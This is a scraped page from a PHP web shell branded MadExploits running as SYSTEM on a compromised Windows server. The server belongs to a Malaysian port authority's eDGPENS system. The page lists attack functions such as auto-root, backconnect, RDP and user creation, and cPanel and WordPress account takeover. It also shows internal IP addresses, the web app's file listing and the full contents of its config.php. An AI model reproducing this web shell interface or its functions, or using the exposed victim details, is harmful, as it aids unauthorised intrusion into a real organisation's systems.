Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
bak.sql
0
B
-rw-rw-rw-
config.php
6.25
KB
-rw-rw-rw-
external.json
81
B
-rw-rw-rw-
f_start.php
3.26
KB
-rw-rw-rw-
page_footer.php
220
B
-rw-rw-rw-
page_head.php
3.43
KB
-rw-rw-rw-
page_header.php
4.78
KB
-rw-rw-rw-
page_header_200423.php
3.23
KB
-rw-rw-rw-
page_header_230312.php
4.27
KB
-rw-rw-rw-
page_sidebar.php
17.64
KB
-rw-rw-rw-
page_sidebar_alt.php
3.94
KB
-rw-rw-rw-
template_end.php
1.46
KB
-rw-rw-rw-
template_scripts.php
1.43
KB
-rw-rw-rw-
template_scripts_200430.php
657
B
-rw-rw-rw-
template_scripts_notinclude.ph...
2.68
KB
-rw-rw-rw-
template_start.php
16.75
KB
-rw-rw-rw-
template_start_200728.php
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** * config.php * * Author: pixelcave * * Configuration file. It contains variables used in the template as well as the primary navigation array from which the navigation is created * */ /* Template variables */ ini_set('include_path', 'extension/PHPMailer-master/src/Exception'); ini_set('include_path', 'extension/PHPMailer-master/src/OAuth'); ini_set('include_path', 'extension/PHPMailer-master/src/PHPMailer'); ini_set('include_path', 'extension/PHPMailer-master/src/POP3'); ini_set('include_path', 'extension/PHPMailer-master/src/SMTP'); $link_query = explode("&",$_SERVER['QUERY_STRING']); $base = (basename($_SERVER['PHP_SELF']) == 'index.php') ? basename($_SERVER['PHP_SELF']).'?'.$link_query[0] : basename($_SERVER['PHP_SELF']) ; $template = array( 'name' => 'eDGPENS LPKmn', 'version' => '0.1', 'author' => '', 'robots' => 'noindex, nofollow', 'title' => 'eDGPENS LPKmn', 'description' => 'Sistem eDEPENS Lembaga Pelabuhan Kemaman', // true enable page preloader // false disable page preloader 'page_preloader' => true, // 'navbar-default' for a light header // 'navbar-inverse' for a dark header 'header_navbar' => 'navbar-inverse', // '' empty for a static header/main sidebar // 'navbar-fixed-top' for a top fixed header/sidebars // 'navbar-fixed-bottom' for a bottom fixed header/sidebars 'header' => 'navbar-fixed-top', // '' empty for the default full width layout // 'fixed-width' for a fixed width layout (can only be used with a static header/main sidebar) 'layout' => '', // 'sidebar-visible-lg-mini' main sidebar condensed - Mini Navigation (> 991px) // 'sidebar-visible-lg-full' main sidebar full - Full Navigation (> 991px) // 'sidebar-alt-visible-lg' alternative sidebar visible by default (> 991px) (You can add it along with another class - leaving a space between) // 'sidebar-light' for a light main sidebar (You can add it along with another class - leaving a space between) 'sidebar' => 'sidebar-visible-lg-full', // '' Disable cookies (best for setting an active color theme from the next variable) // 'enable-cookies' Enables cookies for remembering active color theme when changed from the sidebar links (the next color theme variable will be ignored) 'cookies' => '', // '', 'classy', 'social', 'flat', 'amethyst', 'creme', 'passion', 'lpkmn' 'theme' => 'lpkmn', // Used as the text for the header link - You can set a value in each page if you like to enable it in the header 'header_link' => '', // The name of the files in the inc/ folder to be included in page_head.php - Can be changed per page if you // would like to have a different file included (eg a different alternative sidebar) 'inc_sidebar' => 'page_sidebar', 'inc_sidebar_alt' => '', 'inc_header' => 'page_header', // The following variable is used for setting the active link in the sidebar menu 'active_page' => $base ); /* Primary navigation array (the primary navigation will be created automatically based on this array, up to 3 levels deep) */ /* $primary_nav = array( array( 'name' => 'Dashboard', 'url' => 'index.php', 'icon' => 'gi gi-home' ), array( 'url' => 'separator', ), array( 'name' => 'EDG', 'icon' => 'fa fa-cog', 'url' => 'index.php?page=edg/main' ), array( 'name' => 'Utility', 'icon' => 'fa fa-cog', 'sub' => array( array( 'name' => 'edg', 'url' => 'index.php?page=edg/main' ), array( 'name' => 'Codes', 'sub' => array( array( 'name' => 'Blank Page', 'url' => 'index.php?page=kod/blank_page' ), array( 'name' => 'Marine Facilty', 'url' => 'index.php?page=kod/kodMF' ), array( 'name' => 'Port', 'url' => 'index.php?page=kod/kodPort' ), array( 'name' => 'User List', 'url' => 'index.php?page=kod/userList' ), array( 'name' => 'Operation Type', 'url' => 'index.php?page=kod/kodJenisOps' ), array( 'name' => 'Call Purpose', 'url' => 'index.php?page=kod/kodCP' ) ) ), array( 'name' => 'Codes', 'sub' => array( array( 'name' => 'Blank Page', 'url' => 'index.php?page=kod/blank_page' ), array( 'name' => 'Marine Facilty', 'url' => 'index.php?page=kod/kodMF' ), array( 'name' => 'Port', 'url' => 'index.php?page=kod/kodPort' ), array( 'name' => 'Vessel Type', 'url' => 'index.php?page=kod/kodJenisKapal' ), array( 'name' => 'Operation Type', 'url' => 'index.php?page=kod/kodJenisOps' ), array( 'name' => 'Call Purpose', 'url' => 'index.php?page=kod/kodCP' ) ) )//, //array( // 'name' => 'Template Surat', // 'url' => 'page_ready_article.php' //) ) ) ); */
Close